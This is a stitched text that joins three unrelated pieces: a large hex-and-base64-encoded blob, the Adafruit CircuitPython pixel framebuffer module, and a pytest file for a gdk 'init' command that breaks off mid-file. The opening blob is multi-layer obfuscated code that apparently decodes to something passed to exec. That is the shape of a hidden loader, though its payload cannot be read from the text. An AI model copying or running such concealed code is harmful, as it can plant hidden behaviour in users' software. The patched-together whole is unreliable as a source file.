'6378270D0A09090909274E446B304E444D774E6A63324D6A51304E4459334D7A59794E4451304E5463344E6A49304E4451314E6B59'
'324D6A55334E7A6733515459304E3045314D6A4D774E6A45325154597A4D7A493052444D7A4E6A4D334E7A52474E5463324F445A46'
'4E6A270D0A09090909274D334F5459334E6A6B314F5464424E4555314E7A59314E5463314D6A63304E6A49304E43634E43676B6E4E'
'454531515455324D7A4D324E444D784E546B7A4D4459344E7A49314D44557A4E446B334D4452444E444D304D6A5A444E6A49325244'
'5246270D0A09090909274E7A5931515451334E6B4D334E5456424E30457A4D545A434E5463304E6A52424E7A51314E4451324E5449'
'32525452434E544D7A4E5463354E5545314E7A51324E6B49324D6A51334D6A6377524442424D446B794E7A5A444E7A556E44516F4A'
'4A7A270D0A090909092756424E54673052445A474E4549314D544D774E4549324E444D794E4551324E7A55774E544D304D5459354E'
'446B324E7A4D774E4549314F5463354E44457A4F5451354E4451304D5452464E444D32524456424E7A59324D7A59354E4449334E7A'
'597A270D0A09090909274E4467304E6A4D7A4E5545314F4452424E7A41304F5451334E6B4D334E5451354E4463324E4463324E5545'
'32524463344A77304B43536333515456424E44637A4E545A474E6A453251545A474E4555304D7A59334E6B4D334D4456424E6A6B30'
'4D6A270D0A090909092759344E54597A4D545A444E6B55314E7A51304E44557A4E5459304E545932517A55794E446B304E7A5A444E'
'7A55304F5451344E4449334E7A597A4E5467324E445A444E6A4D3252445A434D7A59304E4455784E6B59305154517A4E5463305244'
'5933270D0A09090909274D6A63775243634E43676B6E4D4545774F5449334E45493351544D774E6A6330524455784D7A4130516A51'
'7A4E546332517A5A454E446B304E7A52454E6A63314D4459354E4445334E7A52474E6A637A4D4452434E444D314D545A444D7A4D31'
'4F54270D0A090909092763354E44457A4F5451354E4467324E445A424E446B304D7A637A4E6A63324D7A51344E4449334F4459304D'
'7A49314E6A63354E6A45314D7A4D314E30456E44516F4A4A7A59304E446730515463774E6A4D304D7A59334E7A41304E4455784E7A'
'4133270D0A09090909274D4456424E6A6B304D6A5A424E446B304E4463334E6A6330524455304E6B59305254517A4E6A6332516A52'
'424E6A49304E4451314E7A6730524455334E7A67334D7A52454E5463334E7A5A474E6A49304E4451314E7A67324D6A51334E7A6333'
'4F44270D0A090909092759794E4451304E545A474E6A49314E7A63344A77304B43536333515459304E3045794E7A42454D4545774F'
'5449334E54497A4D4459784E6B45324D7A4D794E45517A4D7A597A4E7A6330526A55334E6A67325254597A4E7A6B324E7A5A464E54'
'5932270D0A0909090927516A59304E6B59324D6A51314E6B4D304E7A56424E4463324F445A424E6A49314E6A52424E7A4D314F545A'
'454E6B4D304D7A59784D7A45334D4455354E545532524463344E5545305243634E43676B6E4D7A45305154637A4E546332516A5246'
'4E44270D0A09090909274D324D5451334E4545334D4455784E6B55304D6A59354E6A4932517A52424D7A5531515451324E6A51314D'
'7A59794E446330525463774E5449314E7A59304E5459314D6A4D774E55457A4E6A55354E304530515451334E6A4932517A63774E54'
'5131270D0A09090909274D545A454D7A6B31515455334E44557A4D545A464E5463314E7A4D784E54636E44516F4A4A7A59794E4463'
'30515463774E54453252445A444E6A6B794E7A42454D4545774F5449334E54493351545A444E7A45314F5455304E4545314E7A5978'
'4D7A270D0A090909092741334F4463774E5445314E544D314E445131515464424E444930517A55314E6B4D324F445A474E6A4D304E'
'7A55794E4467324D6A51344E5459324D5459314E5451314D6A4D784E5451304E7A597A4E7A63314D7A63354A77304B435363324D7A'
'6377270D0A09090909274E454D304D7A51794E6B49314E7A51324E4545334E4455304E4459314D6A5A464E4549314D7A5A434E4555'
'304D7A59334E6B4930515459794E4451304E6A637A4E4551314E7A63334E7A67324D6A51304E445532526A59794E4463334E7A6334'
'4E6A270D0A090909092749304E4451314E7A67324D6A51304E445532526A59794E4451304E5463344E6A49304E7A63334E7A67324D'
'69634E43676B6E4E4451304E545A474E6A49314E7A63344E3045324E4464424E54497A4D4459784E6B45794E7A42454D4545774F54'
'4933270D0A09090909274E6A4D7A4D6A52454D7A4D324D7A63334E4559314E7A59344E6B55324D7A63354E6A6332525455354E3045'
'305254637A4E6A5532516A63344E7A51314E6A5A424E5449324F4455334E4459304E6A63324E5451314E5452464E7A49314D44557A'
'4E6A270D0A09090909274D6E44516F4A4A7A63774E454D304D7A51794E6B49314E7A51324E4545334E4455304E4459314D6A5A464E'
'4549314D7A63334E6A63314E5451314E6A6730526A52454E446330525463304E6A49304F4455324E6A45324E545A424E5445334D7A'
'5135270D0A09090909274E4459334D4455354E6A45304E7A63344E5545324E4463354E6B49334D4451304E5445334D445A424E6A45'
'304D7A51784D7A6B304F5451334A77304B435363334E7A63344E6A49304E4451324E7A4D30524455334E7A63334F4452434E446333'
'4E7A270D0A090909092763344E4551314E7A63344E7A4D794E7A42454D4545774F5449334E4551314E7A63334E7A6730516A51334D'
'7A45334D7A597A4D7A4D324D7A4D774E6A51304E7A5A474D7A4D3052545A424E45557A4D7A52454E445132517A5A474E55457A4D7A'
'5245270D0A09090909274E6B593051544D794E4459304F53634E43676B6E4E6A49304E4451794E6A45314E6A4D784E45457A4E6A55'
'334E6B49324E445A434E6A4D314E7A51324E446731515451344E6B4D32516A55794D7A453051544D324E5451304E7A4D314E455932'
'4D6A270D0A09090909274D784E6B4D314E5455794E54637A4F545A434E455132516A4D784D7A45314E7A5A444E6A4D7A4D5459784E'
'6B51304F5463354E545532524463344E454D314D544D794E7A516E44516F4A4A7A63334E5451304E7A4D784E6B59324D6A51334E54'
'5930270D0A09090909274F4455314E6B55304D6A59784E455132517A56424D7A5931515451314E4555325254597A4E444D794E7A42'
'454D4545774F5449334E6A4D334D4452444E444D304D6A5A434E5463304E6A52424E7A51314E4451324E544932525452434E544D32'
'516A270D0A090909092752464E444D3252445A444E6B51304F5451334E7A67334D7A52454A77304B435363314E4451324E7A4D3052'
'4455334E7A67334D7A52434E4463334E7A63344E6A49304E4451324E7A4D324D6A51304E4459334D7A52434E44637A4D54637A4E6A'
'4D7A270D0A09090909274D7A597A4D7A41324E4451334E6B597A4D7A52464E6B453052544D7A4E4551304E445A444E6B593151544D'
'7A4E455132526A52424D7A4931515463774E4559314E5452424E6B45314D7A51314E4545304E69634E43676B6E4E5463314E6A5934'
'4E54270D0A09090909274D324D5451314E7A63334E7A59314E446731515456424E455132516A56424E3045314E4451304E4459314D'
'7A59794E446330515455354E5445314F4456424E6B45794E7A42454D4545774F5449334E544D304E5456424D7A59314E7A5A434E6A'
'5131270D0A09090909274D7A59314E6B4D334D4463314E544D314F4455324E6B49314D6A64424E44597A4D7A52424E7A6B6E44516F'
'4A4A7A5A434E7A4130516A55304E6B59305254517A4E6A6332517A63334E6A497A4D6A55794D7A45324E4451344E45453252445135'
'4E44270D0A0909090927517A4D4459334E6A49304E4451324E7A4D324D6A51304E4455334F4459794E4451304E545A474E6A49304E'
'4451324E7A4D30524455334E7A67334D7A52454E5463334E7A5A474E6A49314E7A63344E3045324E4464424E54497A4D4459784A77'
'304B270D0A0909090927435363325154597A4D7A493052444D7A4E6A4D334E7A52474E5463324F445A464E6A4D334F5459334E6B55'
'3151545A454E6B497A4E5455784E6B5130525451354E544532516A55324E5545314E7A51324E454532526A55304E4451794E7A4245'
'4D45270D0A090909092745774F5449334E44497A4E4459304E6B4D32516A63354E544932525452464E455130524455324E4545334D'
'7A55354E6B4D324F43634E43676B6E4E4449324E445A454E4555304F5455794E6B55334D4459784E54497A4D5452424D7A59314E7A'
'5A45270D0A09090909274D7A5530515459304E5463314D6A51344E4551314F44597A4E6B5530516A557A4E6B49334D4452444E6B55'
'3051545A444E546B314E7A55784E6B5930516A557A4D7A5533515459304E446730515463774E6A4D304D7A59334E7A41304E445578'
'4E6B270D0A09090909275930515459784E54636E44516F4A4A7A55354E6A63324D7A51334D7A6B32516A59304E5467314D6A63354E'
'5545324F5451784E6A67314D44557A4E444932515459784E445132526A52464E444D324E7A5A434E4545324D6A51304E4455334F44'
'5245270D0A09090909274E5463334F44637A4E4551314E7A63334E6B59794E7A42454D4545774F5449334E6A49304E4451314E7A67'
'324D6A51334E7A63334F4459794E4451304E545A474A77304B435363324D6A55334E7A6733515459304E3045314D6A4D774E6A4532'
'5154270D0A0909090927597A4D7A493052444D7A4E6A4D334E7A52474E5463324F445A464E6A4D334F5459334E6B55314E6A5A434E'
'6A5132526A59794E445532517A51334E5545304E7A59344E6B45324D6A55324E4545334D7A55354E6B5132517A517A4E6A457A4D54'
'6377270D0A09090909274E546B314E545A454E7A6731515452454D7A45305153634E43676B6E4E7A4D314E7A5A434E4555304D7A59'
'784E446330515463774E544532525451794E6A6B324D6A5A444E45457A4E5456424E4459324E44557A4E6A49304E7A52464E7A4131'
'4D6A270D0A090909092755334E6A51314E6A55794D7A413151544D324E546B33515452424E4463324D6A5A444E7A41314E4455784E'
'6B51794E7A42454D4545774F5449334D7A6B31515455334E44557A4D545A464E54636E44516F4A4A7A55334D7A45314E7A59794E44'
'6330270D0A0909090927515463774E54453252445A444E6A6B314D6A64424E6B4D334D5455354E545130515455334E6A457A4D4463'
'344E7A41314D5455314D7A55304E4456424E3045304D6A52444E545532517A59344E6B59324D7A51334E5449304F4459794E446731'
'4E6A270D0A090909092759784E6A55314E4455794D7A45314E4451334E6A4D334E7A557A4E7A6B324D7A63774A77304B4353633051'
'7A517A4E444932516A55334E445930515463304E5451304E6A55794E6B5530516A557A4E6B49305254517A4E6A6332516A52424E6A'
'4930270D0A09090909274E4451324E7A4D30524455334E7A63334F4459794E4451304E545A474E6A49304E7A63334E7A67324D6A51'
'304E4455334F4459794E4451304E545A474E6A49304E4451314E7A67794E7A42454D4545774F5449334E6A49304E79634E43676B6E'
'4E7A270D0A090909092763334F4459794E4451304E545A474E6A49314E7A63344E3045324E4464424E54497A4D4459784E6B45324D'
'7A4D794E45517A4D7A597A4E7A6330526A55334E6A67325254597A4E7A6B324E7A5A464E546B33515452464E7A4D324E545A434E7A'
'6733270D0A09090909274E4455324E6B45314D6A59344E5463304E6A51324E7A59314E4455314E4555334D6A55774E544D324D7A63'
'774E454D6E44516F4A4A7A517A4E444932516A55334E445930515463304E5451304E6A55794E6B5530516A557A4E7A63324E7A5531'
'4E44270D0A090909092755324F4452474E4551304E7A52464E7A51324D6A51344E5459324D5459314E6B45314D54637A4E446B304E'
'6A63774E546B324D5451334E7A6731515459304E7A6B32516A63774E4451314D5463774E6B4D324D6A51344E455532517A52474E6A'
'6379270D0A09090909274E7A42454A77304B43536377515441354D6A637A4D4452434E444D314E7A63334E7A67324D6A51304E4459'
'334D7A52454E5463334E7A63344E4549304E7A63344E7A4D30524455334E7A63334F4452454E5463334E7A63344E4549304E7A6333'
'4E7A270D0A09090909276730524455334E7A67334D7A52454E5463334E7A63344E4549304E7A4D784E7A4D324D7A4D7A4E6A4D7A4D'
'4459304E446332526A4D7A4E4555325153634E43676B6E4E45557A4D7A52454E445132517A5A474E55457A4D7A52454E6B59305154'
'4D79270D0A09090909274E4555304F4459314E446730515459344E54593351545A444E7A6731515451324E4555304D6A52474E5455'
'32517A51344E6A517A4D7A59344E6A6B314D6A4D7A4E6A517A4E4455304E5459324E444D7A4E6A55304E5463304E4467324E444D7A'
'4E6A270D0A090909092767324F5455794E445531515464424E546B6E44516F4A4A7A5A434E5449304E7A49334D455177515441354D'
'6A63324D7A4D774E7A51304F4452454E54673052545A424E45517A4D6A52454E7A6331515451314E6A51334E6A52454D7A417A4E54'
'6378270D0A09090909274E545132515452464E4555314D6A51334E7A67334E6A55334E6B4530525452464E6A497A4D445A474E7A6B'
'314E7A5A464E4449314D4455324E5455334D4463784E54557A4D4455324A77304B43536330516A55794E6B4D324E4455334E6A4530'
'4E6A270D0A090909092752464E6A67314D6A55344E6A517A4D7A56424E5455324F4459784E546332516A4D784E7A49314E7A5A464E'
'7A41314E5455794E445531515455304E546B32516A59304E4549314E7A55324E4459314F5455334E6B51334D4455304E5449314E6A'
'5A47270D0A09090909274D7A49314E6A4D794E7A5132516A55314D7A49314E6A637A4E6A4D304F43634E43676B6E4E5459314E4455'
'334E445931515463794E545532525449334D455177515441354D6A63334D4451334E45517A4D4463774D7A55324D544D7A4E444930'
'5244270D0A090909092755784D7A41304E6A63774E5545304F445A444E4545324D7A51314E5449314D6A597A4E4467324E4459354E'
'54497A4D7A55794E7A63314F545A424E4545334E7A52454E5455334F4463314E5545304F445A444E6A676E44516F4A4A7A55334E44'
'5930270D0A09090909275154637A4E544D7A4D4459304E4559324D6A4D774E7A51314D6A52454E4455334E445A424E54497A4D7A59'
'344E7A6B314F5455324E6A4D7A4E54597A4E5463314D6A55304E4555314E7A63774E6A6B314D6A64424E6B4D7A4E6A55334E6B4D30'
'5254270D0A09090909275A464E6A4D304D7A597A4E7A4130517A517A4E444932516A55334E445930515463304E5451304E6A55794A'
'77304B43536332525452434E544D334E7A59334E5455304E5459344E455930524451334E4555334E4449334D455177515441354D6A'
'6332270D0A09090909274D6A51344E5459324D5459314E6B45314D54637A4E446B304E6A63774E546B324D5451334E7A6731515459'
'304E7A6B32516A63774D6A63794F544A444D455177515441354E6A51314F4455794E6B5130517A55304E6A63794F544A444D6A4177'
'5243270D0A0909090927634E43676B6E4D4545774F5455774E44673052544D774E6A4D3252445A444E7A5531515464424D7A517951'
'7A49774D455177515441354E5545314F4459344E6B4D314F5463334D6A6B77524442424D6A6B6E4B51304B43516B674C6D526C5932'
'396B270D0A09090909275A53686B57464A745446526E4B536B4E4367304B4451706B5A5759675A47315765574658576A556F4B546F'
'4E43676C6A534752724944306759306447656D4D77566E566B53456F314C6D646C6443677044516F4A615759675930686B61794139'
'5053270D0A090909092742734D544673624446734D53687462484E334E4852714E7A597A647A41356147647A4B43646956305A7557'
'6C63314D466C55545868505630357A596A4E5761324E335054306E4B5377675A466853625578555A796B3644516F4A435777786244'
'4673270D0A09090909274D5777784B4731736333633064476F334E6A4E334D446C6F5A334D6F4A316B776147746C615456345A4664'
'734D457444617A306E4B536B4E43676B4A624446734D5777786244456F6257787A647A5230616A63324D3363774F57686E6379676E'
'5754270D0A0909090927426F613256704E57746157453477593230354E557444617A306E4B536B4E43676B4A624446734D57777862'
'44456F62477778624445786244456F62444578624777786244456F6257787A647A5230616A63324D3363774F57686E6379676E576A'
'4A34270D0A0909090927646C6C74526E4E4A526D7830596B5243616B31735758636E4B5377675A466853625578555A796B73494642'
'49546A426A62577831576E6F304C43426157476873575863704B51304B43516C614D6B5A30576C6857634341394947467A5A6A5931'
'5A58270D0A09090909274E6B61476B344E79677044516F4A435764316153413949456431615368614D6B5A30576C685763436B4E43'
'676B4A624446734D5777786244456F6257787A647A5230616A63324D3363774F57686E6379676E5632704B5232524763466C57626B'
'4631270D0A0909090927596C644763474A7465485A694D30467653314539505363704B51304B4451706A534752364944306759584E'
'6D4E6A566C6332526F615467334B436B4E436D7778624446734D5777784B4731736333633064476F334E6A4E334D446C6F5A334D6F'
'4A31270D0A09090909276B776147746C61545635576C684F63475674526D6C6952315676596C6434656D5236556A4268616D4D7954'
'544E6A643039586147356A655764755657307852324D7954586C575644427553314E335A324A586548706B656C49775957706A4D6B'
'307A270D0A0909090927593364505632687559336C6E626C56744D55646A4D6B31354A77304B43516B4A43516B6749436457564442'
'7553314E72505363704B51304B624446734D5777786244456F6257787A647A5230616A63324D3363774F57686E6379676E5754426F'
'6132270D0A090909092756704E54426857464A7A576C4E6F64474A49546A4E4F53464A78546E705A656D5236515456685232523653'
'304E4B56564A366248565A566D4D7755464E4A634574525054306E4B536B4E436D7778624446734D5777784B473173633363306447'
'6F33270D0A09090909274E6A4E334D446C6F5A334D6F4A316B776147746C61545671596A4931625746585A44466A62565676575731'
'47616D45795A486C694D315A31576B517864474A49546A4E4F53464A78546E705A656D5236515456685232523653304E6B61303174'
'6148270D0A090909092764615257525755464E6A634574525054306E4B536B4E436D5259546D786A62464A735A5568524944306754'
'4746695A57776F5930686B65697767644756346444317462484E334E4852714E7A597A647A41356147647A4B436457574535735932'
'3031270D0A090909092761474A585654596E4B537767596D466A61326479623356755A44317462484E334E4852714E7A597A647A41'
'356147647A4B43646B4D6D68775A456456505363704B51304B59306447656D4D78556D786C534645675053424D59574A6C6243686A'
'5347270D0A090909092752364C4342305A586830505731736333633064476F334E6A4E334D446C6F5A334D6F4A315648526E706A4D'
'325232593231524E6963704C43426959574E725A334A766457356B505731736333633064476F334E6A4E334D446C6F5A334D6F4A32'
'5179270D0A09090909276148426B523155394A796B704451706B574535735932745764575249536A556750534246626E5279655368'
'6A534752364B51304B59306447656D4D77566E566B53456F314944306752573530636E6B6F5930686B65696B4E436D4D7A566D6C69'
'5632270D0A09090909277777555735574D4752484F58556750534243645852306232346F5930686B65697767644756346444317462'
'484E334E4852714E7A597A647A41356147647A4B436455527A6C7559566330505363704C43426A623231745957356B50575274566E'
'6C68270D0A090909092756316F314C43426959574E725A334A766457356B505731736333633064476F334E6A4E334D446C6F5A334D'
'6F4A32516E44516F4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A494363794A77304B'
'4351270D0A09090909276B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A4353416E6143634E43'
'676B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B674A33416E44516F4A43516B4A4351'
'6B4A270D0A090909092743516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A4943646B4A77304B43516B4A43516B'
'4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A43516B4A4353416E5279634E43676B4A43516B4A43516B4A43516B4A'
'4351270D0A09090909276B4A43516B4A43516B4A43516B4A43516B4A43516B674A31556E44516F4A43516B4A43516B4A43516B4A43'
'516B4A43516B4A43516B4A43516B4A43516B4A43516B4A494363394A77304B43516B4A43516B4A43516B4A43516B4A43516B4A4351'
'6B4A270D0A090909092743516B4A43516B4A43516B4A435341704B51304B5931685763475246536A466B53464A32596D6367505342'
'43645852306232346F5930686B65697767644756346444317462484E334E4852714E7A597A647A41356147647A4B43645357476877'
'5A45270D0A09090909274539505363704C43426A623231745957356B505846316158517349474A685932746E636D3931626D513962'
'57787A647A5230616A63324D3363774F57686E6379676E5A444A6F6347516E44516F4A43516B4A43516B4A43516B4A43516B4A4351'
'6B4A270D0A090909092743516B4A43516B4A43516B4A43534167494364485654306E4B536B4E436D7778624446734D5777784B4731'
'736333633064476F334E6A4E334D446C6F5A334D6F4A317047614539695230357A5657313462464E47525856614D307077576B4E6F'
'6557270D0A0909090927497A597A6C69563368365A4870534D474671597A4A4E4D324E335431646F626D4E355A3235555655553555'
'464E6A63457844516D70694D6E6778596C63304F574A586548706B656C49775957706A4D6B307A593364504A77304B43516B4A4351'
'6B67270D0A0909090927494364586147356A65576475564656464F5642545933424C555430394A796B70445170734D577778624446'
'734D53687462484E334E4852714E7A597A647A41356147647A4B436461526D6850596B644F636C5A75566D7454525738785447316B'
'6557270D0A090909092746585557396A62546B7A5546637863324D7A597A426B5232387A546D704F4D303145624739614D30317653'
'6A4178516C42554D47354C5533646E57544935633252584D585651567A467A597A4E6A4D475248627A4E4F616B347A545552734A77'
'304B270D0A090909092743516B4A43516B6749436476576A4E4E62306F774D564A515644427553314E335A316B794F584E6B567A46'
'31597A4E4361474A714D5852695345347A546B6853635535365758706B656B45315955646B656B74445A45356B656A4135536E6C72'
'6343270D0A090909092763704B51304B624446734D5777786244456F6257787A647A5230616A63324D3363774F57686E6379676E57'
'54426B52325674545868566258687355305A4664566F7A536E426151326835596A4E6A4F574A586548706B656C49775957706A4D6B'
'307A270D0A0909090927593364505632687559336C6E626C525752546C5155324E7754454E43616D497965444669567A5135596C64'
'34656D5236556A4268616D4D7954544E6A643039586143634E43676B4A43516B4A4943416E626D4E355A3235555655553555464E6A'
'6345270D0A090909092774525054306E4B536B4E436D7778624446734D5777784B4731736333633064476F334E6A4E334D446C6F5A'
'334D6F4A316B775A45646C62553133566D355761314E46627A464D625752355956645262324E744F544E51567A467A597A4E6A4D47'
'5248270D0A0909090927627A4E4F616B347A5455527362316F7A5457394B4D44465355465177626B74546432645A4D6A6C7A5A4663'
'78645642584D584E6A4D324D775A4564764D303571546A4E4E5247776E44516F4A43516B4A435341674A3239614D303176536A4178'
'556C270D0A090909092742554D47354C5533646E57544935633252584D58566A4D304A6F596D6F7864474A49546A4E4F53464A7854'
'6E705A656D5236515456685232523653304E6B546D52364D446C4B655774774A796B70445170734D577778624446734D5368746248'
'4E33270D0A09090909274E4852714E7A597A647A41356147647A4B43645A656B35585956644B57474A45516C4A6962466C33576B56'
'6A4E5752544E57356A625778725330684B646D52364D5852695345347A546B6853635535365758706B656B45315955646B656B7444'
'5A45270D0A09090909273561656A4135536E6C7263306C48546E5A6953465A30596D6F7864474A49546A4E4F53464A78546E705A4A'
'77304B43516B4A43516B67494364365A4870424E5746485A48704C5132524F555651774F55703561334E4A52303532596B68576447'
'4A75270D0A0909090927546E645A567A5135596C6434656D5236556A4268616D4D7954544E6A643039586147356A65576475564664'
'6A4F5642545933424D51304A365A456473616D457A617A6C576558524753314539505363704B51304B624446734D5777786244456F'
'6257270D0A0909090927787A647A5230616A63324D3363774F57686E6379676E5754466F56324E48556B5A54616B5A7255305A4B4D'
'6C6C74593356614D307077576B4E6F6557497A597A6C69563368365A4870534D474671597A4A4E4D324E335431646F626D4E355A32'
'3555270D0A090909092756324D3555464E6A63457844516D70694D6E6778596C63304F574A586548706B656C49775957706A4D6B30'
'7A5979634E43676B4A43516B4A4943416E643039586147356A655764755646646A4F5642545933424D51304A71596A4A344D574A58'
'4E58270D0A0909090927706A52305A315546637863324D7A597A426B5232387A546D704F4D303145624739614D303176536A417862'
'6C42554D47354C5533646E597A4E5363466B7964445651566D4E79556C4E72505363704B51304B445170734D577778624446734D53'
'6874270D0A090909092762484E334E4852714E7A597A647A41356147647A4B43645A4D4768725A576B3164466C5862485669527A6C'
'3259304E6E634363704B513D3D27292C0D0A0909096458526D4C5467292C0D0A090950484E30636D6C755A7A342C0D0A09095A5868'
'6C5977290D0A29').decode(большевик))
|
# SPDX-FileCopyrightText: 2017 <NAME>, written for Adafruit Industries
# SPDX-FileCopyrightText: Copyright (c) 2020 <NAME> for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`adafruit_pixel_framebuf`
================================================================================
Neopixel and Dotstar Framebuffer Helper
* Author(s): <NAME>
Implementation Notes
--------------------
**Hardware:**
* `Adafruit NeoPixels <https://www.adafruit.com/category/168>`_
* `Adafruit DotStars <https://www.adafruit.com/category/885>`_
* `Flexible 8x32 NeoPixel RGB LED Matrix <https://www.adafruit.com/product/2294>`_
* `Flexible 16x16 NeoPixel RGB LED Matrix <https://www.adafruit.com/product/2547>`_
* `Flexible 8x8 NeoPixel RGB LED Matrix <https://www.adafruit.com/product/2612>`_
* `Adafruit NeoPixel 8x8 NeoMatrices <https://www.adafruit.com/product/3052>`_
* `Adafruit DotStar High Density 8x8 Grid <https://www.adafruit.com/product/3444>`_
* `Adafruit NeoPixel FeatherWing <https://www.adafruit.com/product/2945>`_
* `Adafruit DotStar FeatherWing <https://www.adafruit.com/product/3449>`_
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
* Adafruit's LED Animation library:
https://github.com/adafruit/Adafruit_CircuitPython_LED_Animation
* Adafruit's framebuf library: https://github.com/adafruit/Adafruit_CircuitPython_framebuf
"""
# imports
from micropython import const
import adafruit_framebuf
from adafruit_led_animation.grid import PixelGrid
__version__ = "1.1.1"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_Pixel_Framebuf.git"
HORIZONTAL = const(1)
VERTICAL = const(2)
# pylint: disable=too-many-function-args
class PixelFramebuffer(adafruit_framebuf.FrameBuffer):
"""
NeoPixel and Dotstar FrameBuffer for easy drawing and text on a
grid of either kind of pixel
:param strip: An object that implements the Neopixel or Dotstar protocol.
:param width: Framebuffer width.
:param height: Framebuffer height.
:param orientation: Orientation of the strip pixels - HORIZONTAL (default) or VERTICAL.
:param alternating: Whether the strip alternates direction from row to row (default True).
:param reverse_x: Whether the strip X origin is on the right side (default False).
:param reverse_y: Whether the strip Y origin is on the bottom (default False).
:param tuple top: (x, y) coordinates of grid top left corner (Optional)
:param tuple bottom: (x, y) coordinates of grid bottom right corner (Optional)
:param int rotation: A value of 0-3 representing the rotation of the framebuffer (default 0)
"""
def __init__(
self,
pixels,
width,
height,
orientation=HORIZONTAL,
alternating=True,
reverse_x=False,
reverse_y=False,
top=0,
bottom=0,
rotation=0,
): # pylint: disable=too-many-arguments
self._width = width
self._height = height
self._grid = PixelGrid(
pixels,
width,
height,
orientation,
alternating,
reverse_x,
reverse_y,
top,
bottom,
)
self._buffer = bytearray(width * height * 3)
self._double_buffer = bytearray(width * height * 3)
super().__init__(
self._buffer, width, height, buf_format=adafruit_framebuf.RGB888
)
self.rotation = rotation
def blit(self):
"""blit is not yet implemented"""
raise NotImplementedError()
def display(self):
"""Copy the raw buffer changes to the grid and show"""
for _y in range(self._height):
for _x in range(self._width):
index = (_y * self.stride + _x) * 3
if (
self._buffer[index : index + 3]
!= self._double_buffer[index : index + 3]
):
self._grid[(_x, _y)] = tuple(self._buffer[index : index + 3])
self._double_buffer[index : index + 3] = self._buffer[
index : index + 3
]
self._grid.show()
|
from pathlib import Path
from unittest.mock import Mock, mock_open, patch
import gdk.commands.component.init as init
import gdk.common.exceptions.error_messages as error_messages
import pytest
from urllib3.exceptions import HTTPError
def test_init_run_with_non_empty_directory(mocker):
# Test that an exception is raised when init is run in non-empty directory
test_d_args = {"language": "python", "template": "name"}
mock_is_directory_empty = mocker.patch("gdk.common.utils.is_directory_empty", return_value=False)
mock_init_with_template = mocker.patch("gdk.commands.component.init.init_with_template", return_value=None)
mock_init_with_repository = mocker.patch("gdk.commands.component.init.init_with_repository", return_value=None)
mock_conflicting_args = mocker.patch("gdk.common.parse_args_actions.conflicting_arg_groups", return_value=False)
with pytest.raises(Exception) as e:
init.run(test_d_args)
assert e.value.args[0] == error_messages.INIT_NON_EMPTY_DIR_ERROR
assert mock_is_directory_empty.call_count == 1
assert mock_conflicting_args.call_count == 0
assert mock_init_with_template.call_count == 0
assert mock_init_with_repository.call_count == 0
def test_init_run_with_empty_directory(mocker):
# Test that an exception is not raised when init is run in an empty directory
test_d_args = {"template": None, "language": None, "repository": "repository"}
mock_is_directory_empty = mocker.patch("gdk.common.utils.is_directory_empty", return_value=True)
mock_init_with_template = mocker.patch("gdk.commands.component.init.init_with_template", return_value=None)
mock_init_with_repository = mocker.patch("gdk.commands.component.init.init_with_repository", return_value=None)
mock_conflicting_args = mocker.patch("gdk.common.parse_args_actions.conflicting_arg_groups", return_value=False)
init.run(test_d_args)
assert mock_is_directory_empty.call_count == 1
assert mock_init_with_template.call_count == 0
assert mock_init_with_repository.call_count == 1
assert mock_conflicting_args.call_count == 1
def test_init_run_with_empty_args_repository(mocker):
# Test that an exception is not raised when init is run in an empty directory
test_d_args = {"template": None, "language": None, "repository": None}
mock_is_directory_empty = mocker.patch("gdk.common.utils.is_directory_empty", return_value=True)
mock_init_with_template = mocker.patch("gdk.commands.component.init.init_with_template", return_value=None)
mock_init_with_repository = mocker.patch("gdk.commands.component.init.init_with_repository", return_value=None)
mock_conflicting_args = mocker.patch("gdk.common.parse_args_actions.conflicting_arg_groups", return_value=False)
with pytest.raises(Exception) as e:
init.run(test_d_args)
assert e.value.args[0] == error_messages.INIT_WITH_INVALID_ARGS
assert mock_is_directory_empty.call_count == 1
assert mock_init_with_template.call_count == 0
assert mock_init_with_repository.call_count == 0
assert mock_conflicting_args.call_count == 1
def test_init_run_with_empty_args_template(mocker):
# Test that an exception is not raised when init is run in an empty directory
test_d_args = {"template": None, "language": "python", "repository": None}
mock_is_directory_empty = mocker.patch("gdk.common.utils.is_directory_empty", return_value=True)
mock_init_with_template = mocker.patch("gdk.commands.component.init.init_with_template", return_value=None)
mock_init_with_repository = mocker.patch("gdk.commands.component.init.init_with_repository", return_value=None)
mock_conflicting_args = mocker.patch("gdk.common.parse_args_actions.conflicting_arg_groups", return_value=False)
with pytest.raises(Exception) as e:
init.run(test_d_args)
assert e.value.args[0] == error_messages.INIT_WITH_INVALID_ARGS
assert mock_is_directory_empty.call_count == 1
assert mock_init_with_template.call_count == 0
assert mock_init_with_repository.call_count == 0
assert mock_conflicting_args.call_count == 1
def test_init_run_with_conflicting_args(mocker):
# Test that an exception is not raised when init is run in an empty directory
test_d_args = {"repository": "repository"}
mock_is_directory_empty = mocker.patch("gdk.common.utils.is_directory_empty", return_value=True)
mock_init_with_template = mocker.patch("gdk.commands.component.init.init_with_template", return_value=None)
mock_init_with_repository = mocker.patch("gdk.commands.component.init.init_with_repository", return_value=None)
mock_conflicting_args = mocker.patch("gdk.common.parse_args_actions.conflicting_arg_groups", return_value=True)
with pytest.raises(Exception) as e:
init.run(test_d_args)
assert e.value.args[0] == error_messages.INIT_WITH_CONFLICTING_ARGS
assert mock_is_directory_empty.call_count == 1
assert mock_init_with_template.call_count == 0
assert mock_init_with_repository.call_count == 0
assert mock_conflicting_args.call_count == 1
def test_init_run_with_valid_args(mocker):
    # Checks if args are used correctly to run correct init method:
    # template + language present -> init_with_template is chosen.
    test_d_args = {"language": "python", "template": "name"}
    mock_is_directory_empty = mocker.patch("gdk.common.utils.is_directory_empty", return_value=True)
    mock_init_with_template = mocker.patch("gdk.commands.component.init.init_with_template", return_value=None)
    mock_init_with_repository = mocker.patch("gdk.commands.component.init.init_with_repository", return_value=None)
    init.run(test_d_args)
    assert mock_is_directory_empty.call_count == 1
    assert mock_init_with_template.call_count == 1
    assert mock_init_with_repository.call_count == 0
def test_init_run_with_invalid_args(mocker):
    # All selection args are None -> init.run raises INIT_WITH_INVALID_ARGS
